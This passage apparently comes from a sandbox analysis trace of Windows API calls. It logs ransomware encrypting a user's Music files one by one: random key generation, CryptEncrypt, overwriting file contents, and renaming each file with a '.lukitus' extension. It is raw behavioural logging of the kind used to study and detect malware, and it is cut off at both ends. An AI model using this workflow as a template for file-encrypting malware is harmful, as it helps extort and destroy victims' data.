lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.529] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x11749, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x11749, lpOverlapped=0x0) returned 1 [0108.529] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.530] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64b6ef30, dwHighDateTime=0x1d31760)) [0108.530] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.530] FlushFileBuffers (hFile=0x328) returned 1 [0108.533] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F4ENR-Pu8LXCQZh7xOQc.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f4enr-pu8lxcqzh7xoqc.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x779fcd20, ftCreationTime.dwHighDateTime=0x1d3031e, ftLastAccessTime.dwLowDateTime=0x9e643720, ftLastAccessTime.dwHighDateTime=0x1d2fab8, ftLastWriteTime.dwLowDateTime=0x9e643720, ftLastWriteTime.dwHighDateTime=0x1d2fab8, nFileSizeHigh=0x0, nFileSizeLow=0x89be)) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.533] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.533] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F4ENR-Pu8LXCQZh7xOQc.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f4enr-pu8lxcqzh7xoqc.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.533] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F4ENR-Pu8LXCQZh7xOQc.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f4enr-pu8lxcqzh7xoqc.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-952D529B-BD0BE8B63751.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-952d529b-bd0be8b63751.lukitus"), dwFlags=0x9) returned 1 [0108.535] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.535] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.539] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x89be, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x89be, lpOverlapped=0x0) returned 1 [0108.540] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.540] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x89be, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x89be, lpOverlapped=0x0) returned 1 [0108.540] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.540] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64b6ef30, dwHighDateTime=0x1d31760)) [0108.540] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.541] FlushFileBuffers (hFile=0x328) returned 1 [0108.543] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\JinnQGZRvm31pijVuxNA.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\jinnqgzrvm31pijvuxna.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53c0dd90, ftCreationTime.dwHighDateTime=0x1d2f801, ftLastAccessTime.dwLowDateTime=0x434554b0, ftLastAccessTime.dwHighDateTime=0x1d2ff1c, ftLastWriteTime.dwLowDateTime=0x434554b0, ftLastWriteTime.dwHighDateTime=0x1d2ff1c, nFileSizeHigh=0x0, nFileSizeLow=0x10504)) returned 1 [0108.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.543] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.544] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.544] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\JinnQGZRvm31pijVuxNA.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\jinnqgzrvm31pijvuxna.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.544] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\JinnQGZRvm31pijVuxNA.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\jinnqgzrvm31pijvuxna.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-B0BB4DF0-6CF812A4840D.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-b0bb4df0-6cf812a4840d.lukitus"), dwFlags=0x9) returned 1 [0108.546] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.546] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.551] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x10504, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x10504, lpOverlapped=0x0) returned 1 [0108.551] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.551] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x10504, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x10504, lpOverlapped=0x0) returned 1 [0108.552] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.552] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64b95090, dwHighDateTime=0x1d31760)) [0108.552] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.552] FlushFileBuffers (hFile=0x328) returned 1 [0108.555] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\jYupwHhYlEf.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\jyupwhhylef.mp3"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11282170, ftCreationTime.dwHighDateTime=0x1d30533, ftLastAccessTime.dwLowDateTime=0x160ad1a0, ftLastAccessTime.dwHighDateTime=0x1d2fb57, ftLastWriteTime.dwLowDateTime=0x160ad1a0, ftLastWriteTime.dwHighDateTime=0x1d2fb57, nFileSizeHigh=0x0, nFileSizeLow=0xbf0f)) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.555] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.555] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\jYupwHhYlEf.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\jyupwhhylef.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.555] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\jYupwHhYlEf.mp3" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\jyupwhhylef.mp3"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-9BD64C04-AD5D37A21037.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-9bd64c04-ad5d37a21037.lukitus"), dwFlags=0x9) returned 1 [0108.557] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.557] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.562] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xbf0f, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xbf0f, lpOverlapped=0x0) returned 1 [0108.562] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.562] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xbf0f, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xbf0f, lpOverlapped=0x0) returned 1 [0108.562] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.563] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64bbb1f0, dwHighDateTime=0x1d31760)) [0108.563] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.563] FlushFileBuffers (hFile=0x328) returned 1 [0108.566] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\k9Ct.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\k9ct.wav"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa423520, ftCreationTime.dwHighDateTime=0x1d2f6cf, ftLastAccessTime.dwLowDateTime=0xa8b227d0, ftLastAccessTime.dwHighDateTime=0x1d2fadd, ftLastWriteTime.dwLowDateTime=0xa8b227d0, ftLastWriteTime.dwHighDateTime=0x1d2fadd, nFileSizeHigh=0x0, nFileSizeLow=0xc525)) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0108.566] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0108.566] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\k9Ct.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\k9ct.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0108.566] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\k9Ct.wav" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\k9ct.wav"), lpNewFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\F56924BE-9663-41BB-873FF873-535F0466EFF8.lukitus" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\f56924be-9663-41bb-873ff873-535f0466eff8.lukitus"), dwFlags=0x9) returned 1 [0108.568] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0108.568] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0108.573] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xc525, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xc525, lpOverlapped=0x0) returned 1 [0108.574] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0108.574] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xc525, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0xc525, lpOverlapped=0x0) returned 1 [0108.574] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0108.574] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x64be1350, dwHighDateTime=0x1d31760)) [0108.574] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0108.575] FlushFileBuffers (hFile=0x328) returned 1 [0108.578] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Music\\qiS5lOMJG\\PgYW nGFmTuPUNXUwq.m4a" (normalized: "c:\\users\\aetadzjz\\music\\qis5lomjg\\pgyw ngfmtupunxuwq.m4a"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6df88a0, ftCreationTime.dwHighDateTime=0x1d2fe4f, ftLastAccessTime.dwLowDateTime=0x3bdb6b70, ftLastAccessTime.dwHighDateTime=0x1d2f8f4, ftLastWriteTime.dwLowDateTime=0x3bdb6b70, ftLastWriteTime.dwHighDateTime=0x1d2f8f4, nFileSizeHigh=0x0, nFileSizeLow=0x84db)) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0108.578] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: 